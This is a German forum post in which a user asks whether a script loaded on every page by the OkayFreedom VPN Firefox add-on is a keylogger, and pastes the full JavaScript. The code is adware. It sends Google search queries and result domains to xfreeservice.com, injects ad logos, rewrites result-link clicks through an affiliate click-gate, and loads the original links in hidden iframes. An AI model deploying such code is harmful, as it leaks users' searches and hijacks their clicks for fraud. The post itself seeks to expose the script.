| weißfred | 24.11.2014 18:19 |
OkayFreedom VPN - Firefox Addon = Keylogger?
Hallo liebe Forummitglieder,
im Addon Firebug ist mir aufgefallen, dass mein Firefox auf allen seiten das JavaScript unter "https://a.xfreeservice.com/partner/UnhyLrS9/?cid=1&sid=steganos" lädt. Dafür verantwortlich ist das Addon vom VPN-Programm OkayFreedom. Wenn ich mir den Inhalt so anschaue, denke ich es könnte eine Art Keylogger sein. Liege ich damit richtig?
Hier der Inhalt: PHP-Code:
var x2A_a = null;
var x2A_b = false;
var ao_subid = '';
ao_subid = 'steganos';
var x2A_c = false;
var x8E_a = 'UnhyLrS9';
var x8E_b = '0THxjF98XK';
var x8E_c = '1BAU6PAD1M';
var ausv = 1,
kf8u_dik = "",
rdmv = "",
aox_i = "",
aox_h = "",
aox_o = "",
aox_f = [],
aox_g = "",
aox_m = null,
bt = "",
g_q = "",
call_api_time = null,
sr2f_s9g = "false",
api_retry = 0,
shead = "";
var ao_config;
if (navigator.userLanguage) {
var xjsonsrc = document.createElement("script");
xjsonsrc.type = "text/javascript";
xjsonsrc.src = "https://a.xfreeservice.com/js/json3.min.js";
document.getElementsByTagName('head')[0].appendChild(xjsonsrc);
var xxpathsrc = document.createElement("script");
xxpathsrc.type = "text/javascript";
xxpathsrc.src = "https://a.xfreeservice.com/js/wgxpath.install.js";
document.getElementsByTagName('head')[0].appendChild(xxpathsrc);
setTimeout("wgxpath.install()", 1000);
setTimeout("aox_b()", 1500);
} else {
aox_b();
}
function aox_b() {
ao_config = JSON.parse('{"a":"gbqfq","b":"ires","c":"//div[@class=\'rc\']/h3/a","d":"*/../../div","e":"*/../..","f":{"2":"visible","1":"0px 0px 0px 100px","4":"display"}}');
window.setInterval("ao_start(ao_subid)", 700);
}
function ao_start(ao_subid) {
if (ao_config["a"] == null) return;
if (location.href.indexOf('?q=') == -1 && location.href.indexOf('&q=') == -1 && location.href.indexOf('#q=') == -1 && (document.getElementById(ao_config["a"]) == null || document.getElementById(ao_config["a"]).value == '')) return;
if (location.href.indexOf('tbm=isch') > -1 || location.href.indexOf('tbm=vid') > -1 || location.href.indexOf('tbm=shop') > -1 || location.href.indexOf('tbm=nws') > -1 || location.href.indexOf('tbm=bks') > -1 || location.href.indexOf('tbm=app') > -1 || location.href.indexOf('tbm=is') > -1 || location.href.indexOf('tbm=i') > -1 || location.href.indexOf('/advanced_search') > -1 || location.href.indexOf('scholar.google.com') > -1 || location.href.indexOf('apis.google.com') > -1 || location.href.indexOf('docs.google.com') > -1 || location.href.indexOf('/url?') > -1 || location.href.indexOf('/maps') > -1 || location.href.indexOf('/uds/afs?') > -1 || location.href.indexOf('books.google') > -1 || location.href.indexOf('/aclk?') > -1) return;
if (document.getElementById(ao_config["b"]) == null || document.getElementById(ao_config["b"]).getAttribute("ao") != null) return;
document.getElementById(ao_config["b"]).setAttribute("ao", true);
aox_f = [];
var nL = [];
aox_i = g_q = "";
var x = document.evaluate(ao_config["c"], document.body, null, XPathResult.ANY_TYPE, null);
var y = null;
while (y = x.iterateNext()) nL.push(y);
for (var i = 0; i < nL.length; i++) {
var z = nL[i].host.replace('www.', '');
z = z.replace(':80', '');
z = z.replace(':443', '');
aox_i += z + ",";
nL[i].setAttribute("lf93je", nL[i].href);
}
if (aox_i.length == 0) {
return;
}
g_q = document.getElementById(ao_config["a"]).value;
aox_g = "hxxp://b.xfreeservice.com/redir/clickGate.php?u=" + x8E_a + "&m=12&p=" + x8E_b + "&t=33&s=" + encodeURIComponent(ao_subid) + "&q=" + g_q;
aox_h = aox_a("k8ve" + x8E_c + aox_i + "D9vk-f2");
var i_o = !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0;
var i_f = typeof InstallTrigger !== 'undefined';
var i_s = Object.prototype.toString.call(window.HTMLElement).indexOf('Constructor') > 0;
var i_c = !!window.chrome && !i_o;
var i_i = /*@cc_on!@*/ false || !!document.documentMode;
bt = 4;
bt = i_c ? 0 : bt;
bt = i_f ? 1 : bt;
bt = i_i ? 2 : bt;
bt = i_s ? 3 : bt;
if (bt == "undefined") bt = 4;
kf8u_dik = "";
sr2f_s9g = "false";
api_retry = 0;
call_api(bt, g_q, rdmv, x8E_c, aox_h, aox_i, api_retry)
};
function call_api(bt, g_q, rdmv, x8E_c, aox_h, aox_i, api_retry) {
var se_p = document.location.href.match("\&start=([^\&]*)");
se_p = se_p && se_p.length > 1 ? (parseInt(se_p[1]) + 1) : "1";
var saoajax = document.createElement("script");
saoajax.type = "text/javascript";
saoajax.src = "https://a.xfreeservice.com/?r=0&bt=" + bt + "&rdmv=" + rdmv + "&bl=" + navigator.language + "&p=" + x8E_c + "&k=" + aox_h + "&sp=" + se_p + "&tld=" + aox_i + "&q=" + g_q;
var saoajaxinc = document.getElementsByTagName('script')[0];
saoajaxinc.parentNode.insertBefore(saoajax, saoajaxinc);
setTimeout("start_check('" + bt + "','" + g_q + "','" + rdmv + "','" + x8E_c + "','" + aox_h + "','" + aox_i + "','" + api_retry + "')", 600);
}
function start_check(bt, g_q, rdmv, x8E_c, aox_h, aox_i, api_retry) {
api_retry++;
if (sr2f_s9g == "true") {
aox_c();
} else {
if (api_retry < 5) {
setTimeout("start_check('" + bt + "','" + g_q + "','" + rdmv + "','" + x8E_c + "','" + aox_h + "','" + aox_i + "','" + api_retry + "')", 600);
}
}
}
function aox_c() {
if (kf8u_dik.length == 0) return;
aox_f = [];
query_result_array = kf8u_dik.split(",");
for (var i = 0; i < query_result_array.length; i++) {
var j = query_result_array[i].split("|");
if (j.length == 3) aox_f.push(j);
}
var nL = [];
var nLa = [];
var x = document.evaluate(ao_config["c"], document.body, null, XPathResult.ANY_TYPE, null);
var y = z = null;
while (y = x.iterateNext()) nL.push(y);
for (var i = 0; i < nL.length; i++) {
y = nL[i];
for (var j = 0; j < aox_f.length; j++) {
if (aox_f[j][0] != y.host.replace('www.', '')) continue;
aox_f[j][0] = "";
if (!x2A_c) {
y.onmousedown = function(e) {
var _i = document.createElement("iframe");
_i.src = this.href;
_i.style.display = "none";
document.body.appendChild(_i);
this.href = aox_g + "&url=" + encodeURIComponent(this.getAttribute("lf93je"));
return true;
};
}
nLa = [];
x = document.evaluate(ao_config["d"], y.parentNode, null, XPathResult.ANY_TYPE, null);
while (z = x.iterateNext()) nLa.push(z);
for (var k = 0; k < nLa.length; k++) {
nLa[k].parentNode.id = "a" + aox_f[j][2];
for (var l = 0; l < Object.keys(ao_config["f"]).length; l++) {
aox_p(nLa[k], Object.keys(ao_config["f"])[l], ao_config["f"][Object.keys(ao_config["f"])[l]]);
}
}
x = document.evaluate(ao_config["e"], y.parentNode, null, XPathResult.ANY_TYPE, null);
z = x.iterateNext();
var _a = document.createElement("a");
_a.href = y.getAttribute("lf93je");
_a.onmousedown = function() {
this.href = aox_g + "&url=" + encodeURIComponent(this.href);
};
_a.style.border = "0px";
_a.id = "b" + aox_f[j][2];
var _d = document.createElement("div");
_d.style.position = 'absolute';
_d.innerHTML = "<img src='https://c.xfreeservice.com/logos_v2/90x45/" + aox_f[j][2] + ".gif' border='0' width='90' height='45'/>";
if (x2A_a != null) {
_a.title = "Ad by " + x2A_a;
_d.innerHTML += "<br/>Ad by " + x2A_a;
_d.style.color = "#999999";
_d.style.fontSize = "8px";
_d.style.width = "90px";
_d.style.whiteSpace = "nowrap";
_d.style.overflow = "hidden";
_d.style.margin = "3px 0px 0px 0px";
if (x2A_b) {
var _ab = document.createElement("a");
_ab.href = "javascript:void()";
_ab.onclick = function() {
document.getElementById("b" + this.id).parentNode.removeChild(document.getElementById("b" + this.id));
var x = document.getElementById("a" + this.id);
for (var i = 0; i < x.childNodes.length; i++)
if (x.childNodes[i].nodeType == 1) x.childNodes[i].style.paddingLeft = '0px';
};
_ab.title = "Close Ad";
_ab.innerHTML = "X";
_ab.style.paddingLeft = "3px";
_ab.style.position = 'absolute';
_ab.style.right = '0px';
_ab.style.backgroundColor = '#ffffff';
_ab.id = aox_f[j][2];
_d.appendChild(_ab);
}
}
_a.appendChild(_d);
z.insertBefore(_a, z.childNodes[1]);
}
}
};
function aox_p(e, a, v) {
switch (a) {
case "1":
e.style.padding = v;
break;
case "2":
e.style.overflow = v;
break;
case "4":
e.style.display = v;
break;
}
}
function aox_a(string) {
function aox_s(aox_t, aox_u) {
return (aox_t << aox_u) | (aox_t >>> (32 - aox_u))
}
function aox_v(lX, lY) {
var lX4, lY4, lX8, lY8, aox_w;
lX8 = (lX & 0x80000000);
lY8 = (lY & 0x80000000);
lX4 = (lX & 0x40000000);
lY4 = (lY & 0x40000000);
aox_w = (lX & 0x3FFFFFFF) + (lY & 0x3FFFFFFF);
if (lX4 & lY4) {
return (aox_w ^ 0x80000000 ^ lX8 ^ lY8)
}
if (lX4 | lY4) {
if (aox_w & 0x40000000) {
return (aox_w ^ 0xC0000000 ^ lX8 ^ lY8)
} else {
return (aox_w ^ 0x40000000 ^ lX8 ^ lY8)
}
} else {
return (aox_w ^ lX8 ^ lY8)
}
}
function F(x, y, z) {
return (x & y) | ((~x) & z)
}
function G(x, y, z) {
return (x & z) | (y & (~z))
}
function H(x, y, z) {
return (x ^ y ^ z)
}
function I(x, y, z) {
return (y ^ (x | (~z)))
}
function FF(a, b, c, d, x, s, ac) {
a = aox_v(a, aox_v(aox_v(F(b, c, d), x), ac));
return aox_v(aox_s(a, s), b)
};
function GG(a, b, c, d, x, s, ac) {
a = aox_v(a, aox_v(aox_v(G(b, c, d), x), ac));
return aox_v(aox_s(a, s), b)
};
function HH(a, b, c, d, x, s, ac) {
a = aox_v(a, aox_v(aox_v(H(b, c, d), x), ac));
return aox_v(aox_s(a, s), b)
};
function II(a, b, c, d, x, s, ac) {
a = aox_v(a, aox_v(aox_v(I(b, c, d), x), ac));
return aox_v(aox_s(a, s), b)
};
function aox_x(string) {
var aox_y;
var aox_z = string.length;
var aoy_c_aox_r1 = aox_z + 8;
var aoy_c_aox_r2 = (aoy_c_aox_r1 - (aoy_c_aox_r1 % 64)) / 64;
var aoy_c = (aoy_c_aox_r2 + 1) * 16;
var aoy_d = Array(aoy_c - 1);
var aoy_e = 0;
var aoy_f = 0;
while (aoy_f < aox_z) {
aox_y = (aoy_f - (aoy_f % 4)) / 4;
aoy_e = (aoy_f % 4) * 8;
aoy_d[aox_y] = (aoy_d[aox_y] | (string.charCodeAt(aoy_f) << aoy_e));
aoy_f++
}
aox_y = (aoy_f - (aoy_f % 4)) / 4;
aoy_e = (aoy_f % 4) * 8;
aoy_d[aox_y] = aoy_d[aox_y] | (0x80 << aoy_e);
aoy_d[aoy_c - 2] = aox_z << 3;
aoy_d[aoy_c - 1] = aox_z >>> 29;
return aoy_d
};
function aoy_i(aox_t) {
var aoy_h = "",
aoy_h_aox_r = "",
aoy_j, aoy_k;
for (aoy_k = 0; aoy_k <= 3; aoy_k++) {
aoy_j = (aox_t >>> (aoy_k * 8)) & 255;
aoy_h_aox_r = "0" + aoy_j.toString(16);
aoy_h = aoy_h + aoy_h_aox_r.substr(aoy_h_aox_r.length - 2, 2)
}
return aoy_h
};
function aoy_l(string) {
string = string.replace(/\r\n/g, "\n");
var aoy_m = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
aoy_m += String.fromCharCode(c)
} else if ((c > 127) && (c < 2048)) {
aoy_m += String.fromCharCode((c >> 6) | 192);
aoy_m += String.fromCharCode((c & 63) | 128)
} else {
aoy_m += String.fromCharCode((c >> 12) | 224);
aoy_m += String.fromCharCode(((c >> 6) & 63) | 128);
aoy_m += String.fromCharCode((c & 63) | 128)
}
}
return aoy_m
};
var x = Array();
var k, AA, BB, CC, DD, a, b, c, d;
var S11 = 7,
S12 = 12,
S13 = 17,
S14 = 22;
var S21 = 5,
S22 = 9,
S23 = 14,
S24 = 20;
var S31 = 4,
S32 = 11,
S33 = 16,
S34 = 23;
var S41 = 6,
S42 = 10,
S43 = 15,
S44 = 21;
string = aoy_l(string);
x = aox_x(string);
a = 0x67452301;
b = 0xEFCDAB89;
c = 0x98BADCFE;
d = 0x10325476;
for (k = 0; k < x.length; k += 16) {
AA = a;
BB = b;
CC = c;
DD = d;
a = FF(a, b, c, d, x[k + 0], S11, 0xD76AA478);
d = FF(d, a, b, c, x[k + 1], S12, 0xE8C7B756);
c = FF(c, d, a, b, x[k + 2], S13, 0x242070DB);
b = FF(b, c, d, a, x[k + 3], S14, 0xC1BDCEEE);
a = FF(a, b, c, d, x[k + 4], S11, 0xF57C0FAF);
d = FF(d, a, b, c, x[k + 5], S12, 0x4787C62A);
c = FF(c, d, a, b, x[k + 6], S13, 0xA8304613);
b = FF(b, c, d, a, x[k + 7], S14, 0xFD469501);
a = FF(a, b, c, d, x[k + 8], S11, 0x698098D8);
d = FF(d, a, b, c, x[k + 9], S12, 0x8B44F7AF);
c = FF(c, d, a, b, x[k + 10], S13, 0xFFFF5BB1);
b = FF(b, c, d, a, x[k + 11], S14, 0x895CD7BE);
a = FF(a, b, c, d, x[k + 12], S11, 0x6B901122);
d = FF(d, a, b, c, x[k + 13], S12, 0xFD987193);
c = FF(c, d, a, b, x[k + 14], S13, 0xA679438E);
b = FF(b, c, d, a, x[k + 15], S14, 0x49B40821);
a = GG(a, b, c, d, x[k + 1], S21, 0xF61E2562);
d = GG(d, a, b, c, x[k + 6], S22, 0xC040B340);
c = GG(c, d, a, b, x[k + 11], S23, 0x265E5A51);
b = GG(b, c, d, a, x[k + 0], S24, 0xE9B6C7AA);
a = GG(a, b, c, d, x[k + 5], S21, 0xD62F105D);
d = GG(d, a, b, c, x[k + 10], S22, 0x2441453);
c = GG(c, d, a, b, x[k + 15], S23, 0xD8A1E681);
b = GG(b, c, d, a, x[k + 4], S24, 0xE7D3FBC8);
a = GG(a, b, c, d, x[k + 9], S21, 0x21E1CDE6);
d = GG(d, a, b, c, x[k + 14], S22, 0xC33707D6);
c = GG(c, d, a, b, x[k + 3], S23, 0xF4D50D87);
b = GG(b, c, d, a, x[k + 8], S24, 0x455A14ED);
a = GG(a, b, c, d, x[k + 13], S21, 0xA9E3E905);
d = GG(d, a, b, c, x[k + 2], S22, 0xFCEFA3F8);
c = GG(c, d, a, b, x[k + 7], S23, 0x676F02D9);
b = GG(b, c, d, a, x[k + 12], S24, 0x8D2A4C8A);
a = HH(a, b, c, d, x[k + 5], S31, 0xFFFA3942);
d = HH(d, a, b, c, x[k + 8], S32, 0x8771F681);
c = HH(c, d, a, b, x[k + 11], S33, 0x6D9D6122);
b = HH(b, c, d, a, x[k + 14], S34, 0xFDE5380C);
a = HH(a, b, c, d, x[k + 1], S31, 0xA4BEEA44);
d = HH(d, a, b, c, x[k + 4], S32, 0x4BDECFA9);
c = HH(c, d, a, b, x[k + 7], S33, 0xF6BB4B60);
b = HH(b, c, d, a, x[k + 10], S34, 0xBEBFBC70);
a = HH(a, b, c, d, x[k + 13], S31, 0x289B7EC6);
d = HH(d, a, b, c, x[k + 0], S32, 0xEAA127FA);
c = HH(c, d, a, b, x[k + 3], S33, 0xD4EF3085);
b = HH(b, c, d, a, x[k + 6], S34, 0x4881D05);
a = HH(a, b, c, d, x[k + 9], S31, 0xD9D4D039);
d = HH(d, a, b, c, x[k + 12], S32, 0xE6DB99E5);
c = HH(c, d, a, b, x[k + 15], S33, 0x1FA27CF8);
b = HH(b, c, d, a, x[k + 2], S34, 0xC4AC5665);
a = II(a, b, c, d, x[k + 0], S41, 0xF4292244);
d = II(d, a, b, c, x[k + 7], S42, 0x432AFF97);
c = II(c, d, a, b, x[k + 14], S43, 0xAB9423A7);
b = II(b, c, d, a, x[k + 5], S44, 0xFC93A039);
a = II(a, b, c, d, x[k + 12], S41, 0x655B59C3);
d = II(d, a, b, c, x[k + 3], S42, 0x8F0CCC92);
c = II(c, d, a, b, x[k + 10], S43, 0xFFEFF47D);
b = II(b, c, d, a, x[k + 1], S44, 0x85845DD1);
a = II(a, b, c, d, x[k + 8], S41, 0x6FA87E4F);
d = II(d, a, b, c, x[k + 15], S42, 0xFE2CE6E0);
c = II(c, d, a, b, x[k + 6], S43, 0xA3014314);
b = II(b, c, d, a, x[k + 13], S44, 0x4E0811A1);
a = II(a, b, c, d, x[k + 4], S41, 0xF7537E82);
d = II(d, a, b, c, x[k + 11], S42, 0xBD3AF235);
c = II(c, d, a, b, x[k + 2], S43, 0x2AD7D2BB);
b = II(b, c, d, a, x[k + 9], S44, 0xEB86D391);
a = aox_v(a, AA);
b = aox_v(b, BB);
c = aox_v(c, CC);
d = aox_v(d, DD)
}
var aox_r = aoy_i(a) + aoy_i(b) + aoy_i(c) + aoy_i(d);
return aox_r.toLowerCase()
};
|
